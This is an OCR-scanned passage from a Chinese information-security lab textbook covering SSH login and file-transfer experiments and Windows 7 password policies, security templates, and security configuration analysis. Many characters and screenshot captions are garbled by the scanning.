SSH 具有 客户 -服务 器 结构 。SSH 客户 端 对 服务 器 发 出 请 求 ，SSH 服务 器 可 以 接受 
或 者 拒绝 客户 端的 请 求 。SSH 可 以 提供 以 下 6 种 功能 。 

(1) 安全 远程 登录 。 

(2) 安全 文件 传输 。 

(3) 安全 执行 远程 命令 。 
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(4) 密 钥 和 代理 。 

(5) 访问 控制 。 

(6) 端口 转发 。 

SSH 支持 多 种 认证 方式 ， 最 常用 的 是 口令 认证 和 公 钥 认证 ， 还 支持 可 信 主 机 认证 和 
PGP 认证 等 。 

SSH 提供 的 安全 特性 ， 可 以 有 效 地 防止 一 些 攻击 ， 包 括 鳃 听 、 名 字 服 务 和 IP 伪 
装 、 连 接 动 持 (Connection Hijacking)、 中 间 人 攻击 和 插入 攻击 。 但 是 ， 由 于 SSH 不 
是 一 个 完整 的 安全 方案 ， 不 能 预防 针对 IP 和 TCP 的 攻击 、 流 量 分 析 攻 击 和 隐蔽 通道 
攻击 等 。 

SSH 协议 的 安全 特性 是 由 其 所 包含 密码 算法 提供 的 ，SSH 协议 因 版 本 不 同 其 所 包含 
的 算法 也 不 同 ， 如 表 7-2 所 示 。 

表 7-2 SSH 协议 中 的 算法 


算法 类 别 SSH-1.5 协议 版 本 SSH-2.0 协议 版 本 


杂凑 函数 | MD5,CRC-32 SHA-1，MD5 


对 称 密 钥 | 3DES,IDEA,ARCFOUR,DES | AES,3DES,Blowfish,Twofish,CAST-128,IDEA,ARCFOUR 


有 zl 


限于 篇 幅 , 这 里 只 进行 SSH 在 口令 认证 方式 下 提供 的 安全 登录 和 安全 文件 传输 两 项 
功能 的 实验 。 其 他 实验 由 读者 自行 完成 。 


【实验 环境 】 
安装 Windows 操作 系统 的 PC 两 台 作 为 SSH 的 客户 机 和 服务 器 。 安 装 SSH Secure 
Client 3.2.9 或 以 上 版 本 软件 ， 服 务 器 安装 WinSSHD 5.23 软件 。 


【实验 步骤 】 

1. 配置 新 的 服务 器 Windows 账户 

服务 器 配置 新 的 Windows 账户 ， 自 行 设 定 用 户 名 和 密码 ， 如 user。 同 时 ， 由 于 SSH 
用 22 号 端口 进行 通信 ， 因 此 需 开 启 服务 器 和 客户 机 防火 墙 的 22 号 端口 。 

2. 启动 SSH 服务 器 

在 进行 实验 之 前 ， 必 须 启 动 服务 器 上 的 WinSSHD 服务 。 启 动 方法 是 : 打开 【开始 】| 
【程序 】|Bitvise WinSSHD|WinSSHD Control Panel， 启 动 WinSSHD 控制 界面 。 单 击 Start 
WinSSHD 按钮 启动 WinSSHD 服务 ， 如 图 7-19 所 示 。 

3. SSH 的 远程 登录 (口令 认证 ) 

(1) 在 客户 机 ， 打 开 【 开 始 】| 【程序 】|SSH Secure ShelllSecure Shell Client， 启 动 客 
户 端 ， 如 图 7-20 所 示 。 

(2) 打开 菜单 EditlSetting， 选 择 Profile Settings|Connection， 如 图 7-21 所 示 。 
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Server 


Server Management 


WinSSID 4.23 - EYALUATION - 30 days remaining 


Copyright (C) 2000-2007 by Bitvise Linited. 
Portions Copyright (C) 1995-2003 by Wei Dai 


Installation ID: F2D646BTD90C2TTEC29B 
Copy Installation ID to Clipboard 


了 Please Purchase within 30 days of initial installation- 
See we WinSSHD. com for purchasing instructions, 


The WinSSID service is ranning 


Er 


图 7-19 WinSSHD 控制 界面 


| Be Edt Vew Wndow Heb 
CE YI Ed 
BE Quick Connect © profies 


SSH Secure Shell 3.2.9 (Build 283) 
Copyright (c) 2000-2003 SSH Communications Security Corp - http://ww.sah.com/ 


This copy of SSH Secure Shell is a non-commercial version. 
This version does not include PKI and PKCS #11 functionality. 


Confi gure protocol settings for the connection Hew 
settings will take effect upon next login. 


Specify # as the host nane or the user nane to be pronpted 
for the information When the profile is chosen for 


Encryption 

Wc 

Compression 

Terninal 

后 Comnect through fire 

后 Bequest tunnels only (disable ter 


图 7-21 SSH 客户 端 连接 配置 界面 
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(3) 在 图 7-21 中 Host 处 填写 服务 器 的 主机 卫 ， 如 192.168.0.201。User 处 填写 在 服 
务 器 端 已 经 添加 的 账户 名 ， 如 user。Encryption 处 选择 界面 算法 为 AES。MAC 处 选择 杂 
凌 函 数 为 HMAC-SHA1。Compression 处 选择 压缩 算法 为 zlib。 其 他 的 保持 默认 状态 不 变 。 
单 击 OK 按钮 确认 配置 信息 。 

(4) 打开 菜单 FilelConnect， 弹 出 登录 对 话 框 ， 如 图 7-22 所 示 。 单 击 Connect 按钮 进 
了 连接 ， 在 弹出 的 对 话 框 中 输入 自行 设置 好 的 口令 并 单 击 OK 按钮 确认 ,如 图 7-23 所 示 。 
若 认证 失败 ， 则 如 图 7-24 所 示 。 


| Connect to Remote Ho 


Ee Host Hane 92. 168. 0. 201 [Connect, 
User Nane Fi el 


Bort 区 


Authentication Trofile Settines> | 


图 7-22 ”登录 界面 图 7-23 口令 输入 界面 


The host “192.168.0.201 is unreachable. 
The host may be down, or there nay be a problen with the network connection 
Sonetimes such problems can also be caused by a misconfigured firewall 


图 7-24 认证 失败 
(5) 服务 器 端口 令 认 证 验证 通过 ， 客 户 端 显示 如 图 7-25 所 示 界 面 。 


0 192168.0.201 - default’ - SSH sec 
由 ge Edt View wndow Hep 
辆 全 改 己 马 外 已 局 的 四 站 多 起 归 


目 Quick Connect 回 profies 


Connected to 192.168.0.201 SSH2 - aes128-cbc - hmac-shal | 80x24 


图 7-25 ”认证 通过 后 界面 


(6) 在 客户 端 命令 行 方式 下 ， 可 以 对 服务 器 进行 安全 操作 ， 如 dir 等 DOS 命令 。 

4. SSH 的 文件 传输 (口令 认证 ) 

(1) 在 客户 机 ， 打 开 【 开 始 】| 【程序 】|SSH Secure ShelllSecure File Transfer Client， 
启动 客户 端 ， 如 图 7-26 所 示 。 
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[| Ele Edt View Operation Window Hep 
| 是 | 昂 名 | 电 电 | 腑 的 | 忽 | 4 ?| 加 | "> 


See| Type ~ 
系统 > 
系统 > 
系统 > 


和 


Transfer| Queuel 
/ | Source Fle |Source Directory |Destination Dre.… | Ste| Status Speed| Time| 


te 


图 7-26 SSH 安全 文件 传输 界面 
(2) 打开 菜单 EditlSettings， 选 择 Profile Settings|Connection， 如 图 7-27 所 示 。 


Configure protocol settings for the FRR ev 
settings will take effect upon next ]t 


Specify # as the host nane or the user nane to be prompted 
for the infornation when the profile is chosen for 


kost [Ea 

Veer Ee 
Fort 区 

Encryption 

Wc 

Compression 

Terninal 

后 Connect through fire 

Bequest tunnels only (disable ter 


CA Certificates 

TDAP Servers 
File Transfer 

Advanced 


图 7-27 SSH 客户 端 连接 配置 界面 
(3) 在 图 7-27 中 Host 处 填写 服务 器 的 主机 IP， 如 192.168.0.201。User 处 填写 在 服 
务 器 端 已 经 添加 的 账户 名 ， 如 user。Encryption 处 选择 加 密 算法 为 AES。MAC 处 选择 杂 
凑 函 数 为 HMAC-SHA1。 Compression 处 选择 压缩 算法 为 zlib。 其 他 的 保持 默认 状态 不 变 。 
单 击 OK 按钮 确认 配置 信息 。 


63 


信息 系统 安全 实验 教程 。 Eeessssssssssa 


(4) 打开 菜单 FilelConnect， 弹 出 登录 对 话 框 ， 如 图 7-28 所 示 。 单 击 Connect 按钮 进 
行 连接 ， 在 弹出 的 对 话 框 中 输入 口令 ， 单 击 OK 按钮 确认 ， 如 图 7-29 所 示 。 


Edt View OQperation Window Hep 
| 日 | 易 呈 | 色 电 | 加 扩 | 我 | 个旧 | 光洁 | 半 财 周 | ©| 多 9| 
| Quick connect 加 pofkes | 
上 | 名 | 重生 多 | 凶 x| 可 | Add | 名 | 汪 国 | X | [em]| Add 


/| 


和 


1 


re I 
Transfer| Queuel 
/ | Source Fie |Source Drectory |Destination Dire...| 。 Size| Status | Speed| Time| 


4 加 II 面 


Connected to 192.168.0.201 - /CSSH2 - aes128-cbc - hmac-shal (30 tems (4.3 MB) | 


图 7-30 文件 传输 界面 


(6) 图 中 左 侧 为 本 地 文件 夹 列 表 ， 右 侧 为 服务 器 上 的 文件 列表 ， 可 以 通过 拖 动 文件 
夹 进行 文件 传输 操作 ， 文 件 在 传输 过 程 中 是 加 密 的 。 


【实验 报告 】 
在 以 上 实验 过 程 中 ,用 Sniffer 工具 抓 取 数 据 包 ， 并 与 在 Telnet 下 抓 取 的 数据 包 进 行 
比较 ， 看 看 有 什么 区 别 。 


【思考 题 】 

(1) SSH 提供 的 6 种 功能 的 实现 原理 是 什么 ? 

(2) SSH 能 够 阻止 一 些 攻击 的 原理 和 方法 是 什么 ? SSH 不 能 够 阻止 其 他 一 些 攻 击 的 
原因 是 什么 ? 是 否 能 够 改进 SSH 协议 来 阻止 这 些 攻击 ? 

(3) 请 读者 自行 完成 基于 公 钥 的 认证 过 程 ， 并 演示 SSH 提供 的 6 项 功能 。 
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第 8 重 有 
Windows 操作 系统 安全 


操作 系统 是 计算 机 资源 的 直接 管理 者 ， 是 计算 机 软件 的 基础 和 核心 ， 一 切 应 用 软件 
都 是 建立 在 操作 系统 之 上 的 ， 操 作 系统 的 安全 是 整个 计算 机 系统 安全 的 基础 ， 没 有 操作 
系统 安全 ， 就 不 可 能 真正 解决 数据 库 安 全 、 网 络 安全 和 其 他 应 用 软件 的 安全 问题 。 

阅读 本 书 可 以 了 解 Windows 系统 的 安全 体系 结构 和 构成 组 件 , 掌握 具体 的 安全 防护 
措施 和 技术 ， 有 具备 对 Windows 操作 系统 安全 进行 加 固 配置 、 系 统 及 服务 安全 问题 分 析 和 
跟踪 处 理 能 力 。 本 实验 主要 以 Windows 7 为 例 进 行 讲 解 。 

本 实验 由 三 个 部 分 组 成 ， 主 要 包括 系统 安全 配置 与 分 析 、 用 户 管理 、 系 统管 理 ， 每 
部 分 包含 若干 个 子 实验 。 
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安全 配置 的 原则 是 : 在 保证 系统 使 用 功能 的 基础 上 提高 其 安全 性 ， 不 需 使 用 的 功能 
一 律 禁止 ， 需 要 使 用 的 要 加 强 安全 监控 。 

Windows 7 安全 配置 可 以 参考 文档 http://technet.microsoft.com/zh-cn/library/ 
dd571075 (WS.10) .aspx， 该 文档 详细 介绍 了 可 完善 Windows 7 操作 系统 安全 性 的 各 种 
安全 设置 。 


8.1.1 安全 策略 设置 


【实验 目的 】 
掌握 使 用 安全 策略 设置 方法 ， 了 解 安全 策略 的 主要 内 容 和 用 途 。 
【原理 简介 】 


操作 系统 的 安全 配置 是 整个 操作 系统 安全 策略 的 核心 ， 其 目的 就 是 从 系统 根源 构筑 
安全 防护 体系 ， 通 过 用 户 和 密码 管理 、 共 享 设置 、 端 口 管理 和 过 滤 、 系 统 服务 管理 、 本 
地 安全 策略 、 外 部 工具 使 用 等 手段 ， 形 成 一 整套 有 效 的 系统 安全 策略 。Windows 7 安装 
的 默认 配置 是 不 安全 的 ， 因 此 ， 在 系统 投入 使 用 之 前 ， 应 该 进行 一 些 设置 ， 以 便 使 系统 
更 安全 。 可 以 将 配置 设置 为 本 地 安全 策略 和 系统 配置 设置 。 安 全 配置 的 原则 是 : 在 保证 
系统 使 用 功能 的 基础 上 提高 其 安全 性 ， 不 需 使 用 的 功能 一 律 禁止 ， 需 要 使 用 的 要 加 强 安 
全 监控 。 

通过 本 地 安全 策略 可 以 控制 : 

e 访问 计算 机 的 用 户 。 
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e 授权 用 户 使 用 计算 机 上 的 哪些 资源 。 
。 是 否 在 事件 日 志 中 记录 用 户 或 组 的 操作 。 


其 中 ， 与 系统 身份 认证 密切 相关 的 密码 策略 用 于 管理 域 账户 或 本 地 用 户 账户 。 它 们 


确定 密码 设置 ， 例 如 强制 执行 和 有 效 期 限 。 


由 于 系统 安全 策略 众多 ， 普 通用 户 无 法 制定 出 安全 的 策略 ， 为 此 微软 公司 提供 了 安 


全 模板 进行 安全 配置 。 安 全 模板 可 用 于 定义 以 下 内 容 。 
e 账户 策略 : 包括 密码 策略 ， 账 户 锁定 策略 ，Kerberos 策略 。 


. 

. 

e 受 限制 的 组 ， 安 全 敏感 性 组 的 成 员 身 份 。 

e 系统 服务 的 安全 设置 : 系统 服务 的 启动 和 权限 。 
e 注册 表 的 安全 设置 : 注册 表 项 权限 。 

e 文件 系统 的 安全 设置 文件 和 文件 夹 权 限 。 
【实验 环境 】 

Windows 7 操作 系统 。 

【实验 步骤 】 


(1) 对 密码 策略 进行 修改 ， 单 击 【 本 地 安全 设置 】|【 账 户 策略 】|【 密 码 策 略 】 如 


图 8-1 所 示 。 


本 地 策略 : 包括 审核 策略 ， 用 户 权 限 分 配 ， 安 全 选项 。 
事件 日 志 : 应 用 程序 、 系 统 和 安全 “事件 日 志 ” 设 置 。 


[EE [eel =>) 
文件 昌 ” 扣 作 (A) 二 看 WW。 帮助 中) 
包 中 | 六 园 | 忆 | 日 加 
局 安全 设置 “| 第 咯 安全 设置 
+ 况 几 六 条 定 码 必须 符合 复杂 性 要 求 。 ”已 禁用 
己 室友 第 咯 司 | 国 宪 码 长 度 最 小 值 8 个 字符 
PW | | Dem 0 天 
eic Wd 密码 最 长 使 用 期限 42 天 
了 高 级 安全 Windows 半 强 制 密码 历史 0 个 E 住 的 密码 
了 网 络 列 表 管 理由 第 咯 。 加 用 丰 jE 呈 0 写 来 依存 友 到 。 已 禁用 
习 公 久 策略 =| 
[ 7 ] » 4 四 ] + 


图 8-1 密码 策略 


(2) 双击 右 侧 【 密 码 必须 符合 复杂 性 要 求 ])， 出 现 如 图 8-2 所 示 界 面 ， 对 密码 复杂 性 
EF 行 修改 ， 该 安全 设置 确定 密码 是 否 符 合 复杂 性 要 求 。 如 启用 该 策略 ， 则 密码 


必须 符合 以 下 最 低 要 求 。 
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@ 不 得 明显 包含 用 户 账户 名 或 用 户 全 名 的 一 部 分 。 


@ 长 度 至 少 为 6 个 字符 。 


@ 包含 来 自 以 下 4 个 类 别 中 的 三 个 字符 。 


e 英文 大 写字 母 ( 从 A 到 2Z)。 
e 英文 小 写字 母 ( 从 a 到 z)。 
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。 基本 数字 (从 0 到 9)。 
e 非 字 母 字 符 例如，!、$、#、%)。 
密码 策略 设置 之 后 ， 在 更 改 或 创建 密码 时 ， 会 强制 执行 复杂 性 要 求 。 


图 8-2 密码 复杂 性 要 求 策略 设置 


(3) 双击 右 侧 的 【密码 长 度 最 小 值 】〗 出 现 如 图 8-3 所 示 界 面 ， 对 密码 长 度 最 小 值 进 
行 修改 。 


本 地 安全 设置 
更 密码 长 度 最 小 值 


图 8-3 密码 长 度 最 小 值 策略 设置 


(4) 双击 右 侧 的 【密码 最 长 使 用 期 限 】 出 现 如 图 8-4 所 示 界 面 ， 该 安全 设置 确定 系 
统 要 求 用 户 更 改 密码 之 前 可 以 使 用 该 密码 的 时 间 (单位 为 天 )。 可 将 密码 的 过 期 天 数 设置 
在 1 一 999 天 之 间 ， 或 将 天 数 设 置 为 0， 可 指定 密码 永 不 过 期 。 如 果 密 码 最 长 使 用 期 限 在 
1 一 999 天 之 间 ， 那 么 密码 最 短 使 用 期 限 必须 小 于 密码 最 长 使 用 期 限 。 如 果 密 码 最 长 使 用 
期 限 设置 为 0, 则 密码 最 短 使 用 期 限 可 以 是 1 一 998 天 之 间 的 任何 值 。 使 密码 每 隔 30 一 90 
天 失效 是 一 种 安全 策略 。 通 过 这 种 方式 ， 攻 击 者 只 能 够 在 有 限 的 时 间 内 破解 用 户 密码 并 
访问 用 户 的 网 络 资源 。 通 过 对 密码 的 最 长 有 效 期 进行 修改 ， 保 证 用 户 的 密码 到 达 有 效 期 
后 必须 更 换 密码 。 

(5) 双击 右 侧 的 【密码 最 短 使 用 期 限 】 出 现 如 图 8-5 所 示 界 面 ， 该 安全 策略 设置 确 
定 用 户 可 以 更 改 密码 之 前 必须 使 用 该 密码 的 时 间 (单位 为 天 )。 

可 以 设置 1~998 天 之 间 的 某 个 值 ， 或 者 通过 将 天 数 设 置 为 0， 允许 立即 更 改 密码 。 
密码 最 短 使 用 期 限 必须 小 于 密码 最 长 使 用 期 限 ， 除 非 密码 最 长 使 用 期 限 设置 为 0 (表明 
密码 永 不 过 期 )。 如 果 密 码 最 长 使 用 期 限 设置 为 0， 那 么 密码 最 短 使 用 期 限 可 设置 为 0~ 
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8-5 密码 最 短 使 用 期 限 


998 天 之 间 的 任意 值 。 如 果 希 望 强制 密码 历史 有 效 , 请 将 密码 最 短 有 效 期 限 配置 为 大 于 0。 
如 果 没 有 密码 最 短 有 效 期 限 ， 则 用 户 可 以 重复 循环 设置 密码 ， 直 到 获得 喜欢 的 旧 密码 。 
默认 情况 下 将 密码 历史 记录 设置 为 1。 

(6) 双击 右 侧 的 【强制 密码 历史 】 出 现 如 图 8-6 所 示 界 面 ， 重 新 使 用 旧 密 码 之 前 ， 
该 安全 设置 确定 与 某 个 用 户 账户 相关 的 唯一 新 密码 的 数量 。 该 值 必须 为 0 一 24 之 间 的 一 
个 数值 ， 该 策略 通过 确保 旧 密 码 不 能 继续 使 用 ， 从 而 能 够 增强 安全 性 。 


a 


图 8-6 ”强制 密码 历史 
(7) 双击 右 侧 的 【用 可 还 原 的 加 密 来 存储 密码 】 出 现 如 图 8-7 所 示 界 面 ， 该 安全 设 
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置 确定 操作 系统 是 否 使 用 可 还 原 的 加 密 来 存储 密码 。 


本 地 安全 设置 | 
| | 用 可 还 原 的 加 密 来 伟 存 室 码 


自己 自用 四 ) 
回忆 医用 区] 


[mle [snw |]| 
图 8-7 用 可 还 原 的 加 密 来 存储 密码 


如 果 应 用 程序 使 用 了 要 求知 道 用 户 密码 才能 进行 身份 验证 的 协议 ， 则 该 策略 可 对 
它 提 供 支 持 。 使 用 可 还 原 的 加 密 存 储 密码 和 存储 明文 版 本 密码 在 本 质 上 是 相同 的 。 因 
此 ， 除 非 应 用 程序 有 比 保护 密码 信息 更 重要 的 要 求 ， 否 则 不 必 启 用 该 策略 。 当 使 用 质 
询 握手 身份 验证 协议 (CHAP) 通过 远程 访问 或 Internet 身份 验证 服务 (IAS) 进行 身 
份 验证 时 ， 该 策略 是 必需 的 。 在 Internet 信息 服务 (IIS) 中 使 用 摘要 式 验 证 时 也 要 求 启 
用 该 策略 。 

(8) 设置 完成 后 退出 【本 地 安全 设置 ]， 在 控制 台中 输入 命令 “gpupdate”， 系 统 将 
刷新 刚才 修改 的 安全 策略 。 选 择 一 个 普通 用 户 ， 为 该 用 户 重 设 口令 ， 体 会 密码 加 强 策 略 
带 来 的 作用 。 

【实验 报告 】 

(1) 阐述 各 个 密码 安全 策略 的 主要 作用 。 

(2) 描述 密码 策略 修改 前 后 ， 用 户 密码 设置 的 不 同 。 


【思考 题 】 

(1) 如 何 设置 安全 性 高 并 且 容易 记忆 的 口令 ? 

(2) 在 【本 地 安全 设置 】 中 对 账户 锁定 策略 进行 设置 ， 然 后 重新 登录 系统 ， 使 用 其 
他 用 户 的 口令 登录 系统 ， 体 会 账户 锁定 策略 的 作用 。 


8.1.2 使 用 安全 模板 配置 安全 策略 
【实验 目的 】 
掌握 使 用 安全 模板 配置 安全 策略 的 方法 。 


【原理 简介 】 

由 于 系统 安全 策略 众多 ， 普 通用 户 无 法 制定 出 安全 的 策略 ， 为 此 微软 公司 提供 了 安 
全 模板 进行 安全 配置 。 使 用 管理 控制 台 的 安全 模板 管理 单元 ， 可 以 创建 计算 机 或 网 络 的 
安全 策略 。 它 是 考虑 整个 系统 范围 内 安全 的 单 点 入 口 点 。 安 全 模板 管理 单元 并 不 引入 新 
的 安全 参数 ， 它 只 是 将 所 有 的 现 有 安全 属性 组 织 在 一 起 以 便于 安全 管理 。 将 安全 模板 导 
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入 到 “组 策略 ”对 象 中 可 以 通过 立即 配置 域 或 部 门 的 安全 性 来 简化 域 管理 。 要 将 安全 模 
板 应 用 于 本 地 计算 机 ， 可 以 使 用 “安全 配置 和 分 析 ” 或 Secedit 命令 行 工 具 。 

默认 情况 下 ， 预 定义 的 安全 模板 存储 在 于 如 下 目录 : systemroot\Security\Templates。 
安全 模板 分 为 以 下 5 类 。 

1. 默认 安全 设置 (Setup security.inf) 

Setup security.inf 模板 是 在 安装 期 间 针 对 每 台 计 算 机 创建 的 。 根 据 所 进行 的 安装 是 全 
新 安装 还 是 升级 ， 该 模板 在 不 同 的 计算 机 中 可 能 不 同 。Setup security.inf 代表 了 在 安装 操 
作 系 统 期 间 所 应 用 的 默认 安全 设置 ， 其 中 包括 对 系统 驱动 器 的 根 目 录 的 文件 权限 。 它 可 
以 用 在 服务 器 或 客户 端 计算 机 上 ， 但 不 能 应 用 于 域 控制 器 。 此 模板 的 某 些 部 分 可 应 用 于 
故障 恢复 。 

2. 域 控制 器 默认 安全 设置 (DC security.inf) 

该 模板 是 在 服务 器 被 升级 为 域 控 制 器 时 创建 的 。 它 反映 了 文件 、 注 册 表 以 及 系统 服 
务 的 默认 安全 设置 。 重 新 应 用 它 后 ， 上 述 范围 的 安全 设置 将 被 重新 设置 为 默认 值 。 它 可 
能 履 盖 由 其 他 应 用 程序 创建 的 新 文件 、 注 册 表 和 系统 服务 的 权限 。 使 用 “安全 配置 和 分 
析 ” 管 理 单元 或 Secedit 命令 行 工 具 可 以 应 用 它 。 

3. 兼容 (compatws.inf) 

对 于 工作 站 及 服务 器 的 默认 权限 授予 三 个 本 地 组 : Administrators、Power Users 和 
Users。Administrators 享有 最 高 的 特权 ， 而 Users 的 特权 最 低 。 

4. 安全 (Secure*.inf) 

安全 模板 定义 了 至 少 可 能 影响 应 用 程序 兼容 性 的 增强 安全 设置 。 例 如 ， 安 全 模板 定 
义 了 更 严密 的 密码 、 锁 定 和 审核 设置 。 

此 外 ， 安 全 模板 还 限制 了 LAN Manager 和 NTLM 身份 认证 协议 的 使 用 ， 其 方式 是 
将 客户 端 配置 为 仅 可 发 送 NTLMv2 响应 ， 而 将 服务 器 配置 为 可 拒绝 LAN Manager 的 
响应 。 

S. 高 级 安全 (hisec*.inf) 

高 级 安全 模板 是 对 加 密 和 签名 做 进一步 限制 的 安全 模板 的 扩展 集 ， 这 些 加 密 和 签名 
是 进行 身份 认证 和 保证 数据 通过 安全 通道 以 及 在 SMB 客户 端 和 服务 器 之 间 进 行 安全 传 
输 所 必需 的 。 例 如 ， 安 全 模板 可 以 使 服务 器 拒绝 LAN Manager 的 响应 ， 而 高 级 安全 模板 
则 可 使 服务 器 同时 拒绝 LAN Manager 和 NTLM 的 响应 。 安 全 模板 可 以 启用 服务 器 端的 
SMB 数据 包 签名 ， 而 高 级 安全 模板 则 要 求 这 种 签名 。 此 外 ， 高 级 安全 模板 还 要 求 对 形成 
域 到 成 员 以 及 域 到 域 的 信任 关系 的 安全 通道 数据 进行 强力 加 密 和 签名 。 可 以 通过 “安全 
模板 ”查看 安全 模板 设置 。*.inf 文件 也 可 以 按 文本 文件 查看 。 这 些 文件 位 于 : %windir%A\ 


Security\Templates。 


【实验 环境 】 
Windows XP 以 上 操作 系统 。 
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【实验 步骤 】 
(1) 启动 【本 地 安全 策略 】 单 击 菜单 【操作 】|【 导 入 策略 】 出 现 如 图 8-8 所 示 界 
面 ， 选 择 安全 模板 hisecws.inf， 单 击 【 打 开 】 按 钮 ， 就 把 相应 安全 模板 导入 了 系统 。 


策略 导入 来 源 Wl ?|x| 
查找 范围 四 :[ 司 terste: 下 | 向 人 叶 国 


policies 
司 basicdc 图 

到 basicsv 图 ocfiless 

国 basicwk 图 ocfilesw 
国 compatws 图 securedc 


图 8-8 ”安全 模板 导入 


(2) 单 击 【 账 户 策略 】| 【密码 策略 】)， 修 改 【 密 码 长 度 最 小 值 】 为 10 个 字符 。 还 可 
以 对 其 他 安全 策略 进行 修改 。 

(3) 导出 修改 后 的 策略 作为 本 地 新 的 安全 策略 ， 方 法 为 单 击 【 安 全 设置 】 选 项 ， 然 
后 单 击 【 菜 单 】I【 导 出 策略 】|【 本 地 策略 ])， 选 择 一 个 文件 名 保存 。 使 用 命令 “gpupdate” 
激活 修改 后 的 策略 。 然 后 把 该 文件 复制 到 其 他 机 器 ， 利 用 上 面 的 方法 导入 其 他 机 器 ， 使 
用 这 种 方法 可 以 加 快 配置 的 效率 。 


【实验 报告 】 
(1) 利用 安全 模板 设置 系统 的 过 程 。 
(2) 分 析 不 同安 全 模板 的 差异 。 


【思考 题 】 
在 一 个 组 内 利用 安全 模板 的 最 佳 操 作 方 法 是 什么 ? 


8.1.3 ”对 系统 安全 策略 进行 配置 和 分 析 


【实验 目的 】 
掌握 系统 安全 策略 配置 和 安全 分 析 的 方法 。 


【原理 简介 】 

计算 机 上 的 操作 系统 和 应 用 程序 的 状态 是 动态 的 。 例 如 ， 为 了 能 立刻 解决 管理 或 网 
络 问题 ， 可 能 需要 临时 性 地 更 改 安全 策略 。 经 常 性 地 进行 这 种 修改 意味 着 计算 机 不 再 具 
有 原来 的 安全 属性 。 

常规 分 析 作为 企业 风险 管理 程序 的 一 部 分 ， 允 许 管理 员 跟 踪 并 确保 在 每 台 计 算 机 上 
有 足够 高 的 安全 级 别 。 管 理 员 可 以 调整 安全 级 别 ， 最 重要 的 是 ， 检 测 在 系统 长 期 运行 过 
程 中 出 现 的 任何 安全 故障 。 

“安全 配置 和 分 析 ” 能 够 快速 查阅 安全 分 析 结 果 。 在 当前 系统 设置 的 旁边 提出 建议 ， 
用 可 视 化 的 标记 或 注释 突出 显示 当前 设置 与 建议 的 安全 级 别 不 匹配 的 区 域 。“ 安 全 配置 和 
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分 析 ” 也 提供 了 解决 分 析 显示 的 任何 矛盾 的 功能 。 

“安全 配置 和 分 析 ” 还 可 以 用 于 直接 配置 本 地 系统 的 安全 性 。 利 用 个 人 数据 库 ， 可 以 
导入 由 “安全 模板 ”创建 的 安全 模板 ， 并 将 这 些 模板 应 用 于 本 地 计算 机 。 这 将 立即 使 用 
模板 中 指定 的 级 别 配 置 系 统 安全 性 。 


【实验 环境 】 
Windows XP 以 上 操作 系统 。 


【实验 步 又】 

(1) 在 【开始 】| 【运行 】 菜 单项 ， 输 入 “MMC”， 出 现 如 图 8-9 所 示 的 管理 控制 台 
界面。 

(2) 单 击 【控制 台 】 菜 单项 ， 选 择 【 添 站 ia 
加 /删除 管理 单元 】 菜单 项 ,出 现 如 图 8-10 所 | 六 zt Ww Ew WR 症 丙 加 
示 的 管理 界面 。 < 二 四 号 | 生 昌 

(3) 单 击 【 添 加 】 按 钮 ， 出 现 如 图 8-11 |。 有 可 旺 示 的 项 目 。 | 
所 示 的 【添加 独立 管理 单元 】 界面 , 选择 【 安 
全 配置 和 分 析 】 选 项 ， 然 后 单 击 【添加 】 按 
钮 ， 把 安全 配置 和 分 析 管理 界面 添加 到 控制 
台中 ， 然 后 单 击 【 关 闭 】 按 钮 退出 【添加 独 
立 管理 单元 】 界 面 ， 单 击 【确定 】 按 钮 ， 退 出 【添加 /删除 管理 单元 】 界 面 。 

添加 /删除 管理 单元 


到 全民 可 用 的 独立 管理 和 元: 

全 用 此 页 来 源 加 歌 册 除 控制 台 的 独立 管理 单元 。 管理 间 元 
通 Aetivex 控件 

和 en [加 ie 加 人 

全 控制 和 根 节 点 国生 和 De 
弹 SQL Server Configuration 
加 reb 地 址 的 尖 按 
一 waT 控件 


图 8-10 添加 /删除 管理 单元 界面 图 8-11 添加 独立 管理 单元 界面 


(4) 单 击 左 侧 的 【安全 配置 和 分 析 】 列 表 项 ,出 现 安全 配置 和 分 析 的 界面 如 图 8-12 
所 示 。 

(5) 按照 右边 的 提示 ， 右 击 【安全 配置 和 分 析 】 列 表 项 ， 选 择 【 打 开 数 据 库 〗， 可 以 
通过 输入 数据 库 名 称 和 一 个 安全 策略 模板 创建 一 个 新 的 安全 策略 数据 库 或 者 利用 原来 建 
立 的 安全 策略 数据 库 。 利 用 这 个 数据 库 可 以 分 析 当前 计算 机 的 安全 配置 与 安全 策略 模板 
的 配置 的 差异 ， 还 可 以 利用 安全 策略 模板 对 当前 计算 机 进行 配置 。 方 法 是 右 击 【安全 配 
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控制 台 1 - [控制 台 根 节点 \ 安 全 配置 和 分 析 ] 回回 因 | 
入 文件 和 操作) 查看 WD 收 豪 天 Q) 窗口 因 帮助 加 三 | 可 |X| 
千 | 知 | 国 | 久 力 

国 控制 台 根 节点 


BE | 安全 配置 和 分 析 


要 打开 现 有 数据 库 
1。 右 击 贡生 筷 轩 向 办 匠 领域 项 
单 击 打开 


区 
3。 选择 数据 库 ， 然 后 单 击 “打开 ” 


要 创建 新 的 数据 库 
有 击 忒 全 地 时 并 分 匠 领域 项 
单 击 “打开 数据 库 ” 


1 

2. 

3 键入 新 数据 库 名 ， 然 后 单 击 “打开 ” 

4。 选择 要 导入 的 安全 模板 ， 然 后 单 击 “打开 ” 


图 8-12 ”安全 配置 和 分 析 的 界面 
置 和 分 析 】 列 表 项 ， 选 择 【 立 即 配置 计算 机 】 可 以 将 选择 的 安全 模板 应 用 到 当前 计算 机 
上 。 选 择 【 立 即 分 析 计 算 机 】 菜 单项 ， 选 择 好 之 后 出 现 如 图 8-13 所 示 的 界面 。 


扣 控制 台 1 - [控制 台 根 节点 \ 安 全 配置 和 分 析 ] 
只 | 文件 EF) 操作 人 查看 收 若 夹 oO) 窗口 和 帮助 00 | 加 xj 


rator\Ny 
y\Database\aypc. sdb 


库 中 的 安全 设置 配置 或 分 析 


导入 模板 加 ). 
) 


et 


从 这 里 创建 窗口 中 
新 任务 板 视图 (I) 


(6) 分 析 完 成 之 后 单 击 左 侧 的 【安全 配置 和 分 析 】 项 ， 可 以 观察 本 机 的 安全 配置 与 
安全 模板 的 差别 , 如 图 8-14 所 示 , 右 侧 策略 项 中 带 有 红色 的 策略 表示 与 安全 模板 不 一 致 ， 
双击 可 以 了 解 详细 信息 ， 如 图 8-15 所 示 。 

【实验 报告 】 

详细 描述 实验 过 程 ， 针 对 本 机 的 分 析 报 告 ， 分 析 安 全 风险 。 

【思考 题 】 

如 何 有 效 避 免 因为 工作 便利 随意 更 改 安全 策略 带 来 的 安全 风险 ? 


75 


